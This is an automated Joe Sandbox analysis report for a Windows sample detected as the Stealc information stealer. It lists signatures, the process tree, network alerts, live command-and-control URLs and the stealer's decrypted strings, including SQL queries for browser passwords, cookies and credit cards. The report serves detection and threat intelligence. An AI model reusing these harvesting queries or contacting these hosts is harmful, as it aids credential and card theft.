Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7Y18r(193).exe

Overview

General Information

Sample name:7Y18r(193).exe
Analysis ID:1482727
MD5:3a085e2c496b3d2020401c3452b57aef
SHA1:09754968722731fb208ddbebcc6c6a7cc9d42c7b
SHA256:ba12343f978332fa8c76a99e384a9052b0f9ecc1bcf24bd25552832af77a03ef
Tags:exeWormRamnit
Infos:

Detection

Bdaejec, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7Y18r(193).exe (PID: 7472 cmdline: "C:\Users\user\Desktop\7Y18r(193).exe" MD5: 3A085E2C496B3D2020401C3452B57AEF)
    • WuiXLS.exe (PID: 7496 cmdline: C:\Users\user\AppData\Local\Temp\WuiXLS.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 7724 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7832 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://bernardofata.icu/40d570f44e84a454.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Stealc_2Yara detected StealcJoe Security
    00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Stealc_2Yara detected StealcJoe Security
      00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x3d49:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Stealc_2Yara detected StealcJoe Security
        Click to see the 3 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.3.7Y18r(193).exe.2430000.0.raw.unpackJoeSecurity_Stealc_2Yara detected StealcJoe Security
          0.2.7Y18r(193).exe.890e67.1.raw.unpackJoeSecurity_Stealc_2Yara detected StealcJoe Security
            0.2.7Y18r(193).exe.400000.0.raw.unpackJoeSecurity_Stealc_2Yara detected StealcJoe Security
              0.2.7Y18r(193).exe.400000.0.unpackJoeSecurity_Stealc_2Yara detected StealcJoe Security
                0.2.7Y18r(193).exe.890e67.1.unpackJoeSecurity_Stealc_2Yara detected StealcJoe Security
                  Click to see the 2 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-07-26T02:51:47.771172+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49712
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T02:51:33.974086+0200
                  SID:2807908
                  Source Port:49705
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-26T02:52:25.910942+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:51996
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T02:51:31.550495+0200
                  SID:2838522
                  Source Port:54441
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-26T02:51:30.550429+0200
                  SID:2838522
                  Source Port:54441
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-26T02:51:33.550629+0200
                  SID:2838522
                  Source Port:54441
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-26T02:51:29.552802+0200
                  SID:2838522
                  Source Port:54441
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: 7Y18r(193).exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
                  Source: http://bernardofata.icu/40d570f44e84a454.phpAvira URL Cloud: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarqAvira URL Cloud: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarpAvira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarHAvira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarn.=Avira URL Cloud: Label: phishing
                  Antivirus detection for dropped file
                  Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
                  Found malware configuration
                  Source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://bernardofata.icu/40d570f44e84a454.php"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeReversingLabs: Detection: 92%
                  Multi AV Scanner detection for submitted file
                  Source: 7Y18r(193).exeReversingLabs: Detection: 95%
                  Source: 7Y18r(193).exeVirustotal: Detection: 93%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: 7Y18r(193).exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetProcAddress
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: LoadLibraryA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: lstrcatA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: OpenEventA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CreateEventA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CloseHandle
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Sleep
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetUserDefaultLangID
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: VirtualAllocExNuma
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: VirtualFree
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetSystemInfo
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: VirtualAlloc
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HeapAlloc
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetComputerNameA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: lstrcpyA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetProcessHeap
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetCurrentProcess
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: lstrlenA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ExitProcess
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GlobalMemoryStatusEx
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetSystemTime
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SystemTimeToFileTime
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: advapi32.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: gdi32.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: user32.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: crypt32.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ntdll.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetUserNameA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CreateDCA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetDeviceCaps
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ReleaseDC
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CryptStringToBinaryA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sscanf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: VMwareVMware
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HAL9TH
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: JohnDoe
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DISPLAY
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %hu/%hu/%hu
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: http://bernardofata.icu
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: /40d570f44e84a454.php
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: /2a7743b8bbd7e4a7/
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: default
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetEnvironmentVariableA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetFileAttributesA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GlobalLock
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HeapFree
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetFileSize
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GlobalSize
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CreateToolhelp32Snapshot
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: IsWow64Process
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Process32Next
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetLocalTime
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: FreeLibrary
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetTimeZoneInformation
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetSystemPowerStatus
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetVolumeInformationA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetWindowsDirectoryA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Process32First
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetLocaleInfoA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetUserDefaultLocaleName
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetModuleFileNameA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DeleteFileA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: FindNextFileA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: LocalFree
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: FindClose
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SetEnvironmentVariableA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: LocalAlloc
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetFileSizeEx
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ReadFile
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SetFilePointer
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: WriteFile
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CreateFileA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: FindFirstFileA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CopyFileA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: VirtualProtect
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetLastError
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: lstrcpynA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: MultiByteToWideChar
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GlobalFree
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: WideCharToMultiByte
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GlobalAlloc
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: OpenProcess
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: TerminateProcess
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetCurrentProcessId
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: gdiplus.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ole32.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: bcrypt.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: wininet.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: shlwapi.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: shell32.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: psapi.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: rstrtmgr.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CreateCompatibleBitmap
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SelectObject
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: BitBlt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DeleteObject
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CreateCompatibleDC
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdipGetImageEncodersSize
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdipGetImageEncoders
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdiplusStartup
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdiplusShutdown
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdipSaveImageToStream
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdipDisposeImage
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GdipFree
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetHGlobalFromStream
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CreateStreamOnHGlobal
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CoUninitialize
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CoInitialize
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CoCreateInstance
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: BCryptDecrypt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: BCryptSetProperty
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: BCryptDestroyKey
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetWindowRect
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetDesktopWindow
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetDC
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CloseWindow
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: wsprintfA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: EnumDisplayDevicesA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetKeyboardLayoutList
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CharToOemW
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: wsprintfW
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RegQueryValueExA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RegEnumKeyExA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RegOpenKeyExA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RegCloseKey
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RegEnumValueA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CryptBinaryToStringA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CryptUnprotectData
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SHGetFolderPathA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ShellExecuteExA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: InternetOpenUrlA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: InternetConnectA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: InternetCloseHandle
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: InternetOpenA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HttpSendRequestA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HttpOpenRequestA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: InternetReadFile
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: InternetCrackUrlA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: StrCmpCA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: StrStrA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: StrCmpCW
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: PathMatchSpecA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: GetModuleFileNameExA
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RmStartSession
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RmRegisterResources
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RmGetList
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: RmEndSession
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_open
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_prepare_v2
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_step
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_column_text
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_finalize
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_close
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_column_bytes
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3_column_blob
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: encrypted_key
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: PATH
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: NSS_Init
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: NSS_Shutdown
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: PK11_GetInternalKeySlot
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: PK11_FreeSlot
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: PK11_Authenticate
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: PK11SDR_Decrypt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: C:\ProgramData\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: browser:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: profile:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: url:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: login:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: password:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Opera
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: OperaGX
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Network
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: cookies
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: .txt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: TRUE
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: FALSE
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: autofill
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT name, value FROM autofill
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: history
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: name:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: month:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: year:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: card:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Cookies
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Login Data
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Web Data
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: History
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: logins.json
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: formSubmitURL
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: usernameField
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: encryptedUsername
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: encryptedPassword
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: guid
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: cookies.sqlite
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: formhistory.sqlite
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: places.sqlite
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: plugins
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Local Extension Settings
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Sync Extension Settings
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: IndexedDB
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Opera Stable
